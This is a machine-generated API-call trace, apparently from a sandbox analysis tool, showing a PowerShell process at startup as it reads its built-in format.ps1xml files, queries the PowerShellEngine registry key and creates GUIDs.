	[0394.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0394.333] SetErrorMode (uMode=0x1) returned 0x1
	[0394.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0394.333] SetErrorMode (uMode=0x1) returned 0x1
	[0394.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0394.333] SetErrorMode (uMode=0x1) returned 0x1
	[0394.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0394.333] SetErrorMode (uMode=0x1) returned 0x1
	[0394.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0394.333] SetErrorMode (uMode=0x1) returned 0x1
	[0394.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0394.334] SetErrorMode (uMode=0x1) returned 0x1
	[0394.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0394.334] SetErrorMode (uMode=0x1) returned 0x1
	[0394.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0394.334] SetErrorMode (uMode=0x1) returned 0x1
	[0394.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0394.334] SetErrorMode (uMode=0x1) returned 0x1
	[0394.334] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0394.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.335] CoTaskMemFree (pv=0x34e580) 
	[0394.685] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0394.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.685] CoTaskMemFree (pv=0x34e580) 
	[0394.685] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0394.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.686] CoTaskMemFree (pv=0x34e580) 
	[0394.686] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0394.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.686] CoTaskMemFree (pv=0x34e580) 
	[0394.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.686] SetErrorMode (uMode=0x1) returned 0x1
	[0394.686] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0394.687] GetFileType (hFile=0x2f8) returned 0x1
	[0394.687] SetErrorMode (uMode=0x1) returned 0x1
	[0394.687] GetFileType (hFile=0x2f8) returned 0x1
	[0394.687] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.688] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.688] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.688] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.689] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.689] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.689] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0394.689] ReadFile (in: hFile=0x2f8, lpBuffer=0x338d3a2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338d3a2*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0394.689] ReadFile (in: hFile=0x2f8, lpBuffer=0x338de58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x338de58*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0394.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.690] SetErrorMode (uMode=0x1) returned 0x1
	[0394.690] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0394.690] SetErrorMode (uMode=0x1) returned 0x1
	[0394.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.690] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0394.690] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0394.690] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c4820
	[0394.690] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c4820, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0394.690] CoTaskMemFree (pv=0x1b7c4820) 
	[0394.690] RegCloseKey (hKey=0x2f8) returned 0x0
	[0394.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.695] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x524f6690, Data2=0x85ae, Data3=0x4f47, Data4=([0]=0xa9, [1]=0xba, [2]=0xe0, [3]=0x41, [4]=0x9d, [5]=0x24, [6]=0xe6, [7]=0x53))) returned 0x0
	[0394.703] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xda1c4631, Data2=0xcbad, Data3=0x4ef6, Data4=([0]=0x90, [1]=0xe1, [2]=0x6d, [3]=0x4d, [4]=0xe4, [5]=0x6c, [6]=0xfd, [7]=0x49))) returned 0x0
	[0394.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0394.705] SetErrorMode (uMode=0x1) returned 0x1
	[0394.705] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0394.705] GetFileType (hFile=0x2f8) returned 0x1
	[0394.705] SetErrorMode (uMode=0x1) returned 0x1
	[0394.705] GetFileType (hFile=0x2f8) returned 0x1
	[0394.705] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.706] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.706] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.707] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.707] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.707] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0xfb2, lpOverlapped=0x0) returned 1
	[0394.708] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b80da, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b80da*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0394.708] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b89c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x33b89c0*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0394.708] CloseHandle (hObject=0x2f8) returned 1
	[0394.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0394.708] SetErrorMode (uMode=0x1) returned 0x1
	[0394.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0394.708] SetErrorMode (uMode=0x1) returned 0x1
	[0394.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0394.708] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0394.708] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0394.709] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c4820
	[0394.709] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c4820, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0394.709] CoTaskMemFree (pv=0x1b7c4820) 
	[0394.709] RegCloseKey (hKey=0x2f8) returned 0x0
	[0394.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0394.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0394.710] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x4e66beb5, Data2=0x18e8, Data3=0x4e6a, Data4=([0]=0x93, [1]=0xcc, [2]=0x96, [3]=0xcb, [4]=0x1d, [5]=0x4b, [6]=0x68, [7]=0x22))) returned 0x0
	[0394.713] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xdef6c8fc, Data2=0xac4a, Data3=0x4947, Data4=([0]=0x92, [1]=0x7, [2]=0x45, [3]=0x6, [4]=0xf0, [5]=0x2e, [6]=0xbc, [7]=0x58))) returned 0x0
	[0394.716] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x1d4cd207, Data2=0x4111, Data3=0x4d68, Data4=([0]=0xa6, [1]=0x7c, [2]=0xc6, [3]=0x4e, [4]=0x75, [5]=0x7f, [6]=0x8e, [7]=0x5c))) returned 0x0
	[0394.717] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xab39d978, Data2=0xdd38, Data3=0x469c, Data4=([0]=0xa9, [1]=0x9d, [2]=0x48, [3]=0x60, [4]=0xa, [5]=0xee, [6]=0x1e, [7]=0x6e))) returned 0x0
	[0394.717] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x34f3f772, Data2=0x6501, Data3=0x4975, Data4=([0]=0xa7, [1]=0x33, [2]=0x6a, [3]=0x71, [4]=0xbd, [5]=0x3f, [6]=0xf3, [7]=0xeb))) returned 0x0
	[0394.718] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x65444061, Data2=0xc44f, Data3=0x4c23, Data4=([0]=0x83, [1]=0x23, [2]=0x9, [3]=0xb6, [4]=0x9c, [5]=0xa5, [6]=0xe0, [7]=0xdb))) returned 0x0
	[0394.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.719] SetErrorMode (uMode=0x1) returned 0x1
	[0394.719] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0394.719] GetFileType (hFile=0x2f8) returned 0x1
	[0394.719] SetErrorMode (uMode=0x1) returned 0x1
	[0394.719] GetFileType (hFile=0x2f8) returned 0x1
	[0394.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.721] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.721] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.722] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.722] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0394.722] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0xaca, lpOverlapped=0x0) returned 1
	[0394.722] ReadFile (in: hFile=0x2f8, lpBuffer=0x3403d52, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3403d52*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0394.722] ReadFile (in: hFile=0x2f8, lpBuffer=0x3404720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3404720*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0394.722] CloseHandle (hObject=0x2f8) returned 1
	[0394.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.723] SetErrorMode (uMode=0x1) returned 0x1
	[0394.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0394.723] SetErrorMode (uMode=0x1) returned 0x1
	[0394.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.723] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0394.723] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0394.723] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c4820
	[0394.723] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c4820, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0394.723] CoTaskMemFree (pv=0x1b7c4820) 
	[0394.723] RegCloseKey (hKey=0x2f8) returned 0x0
	[0394.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
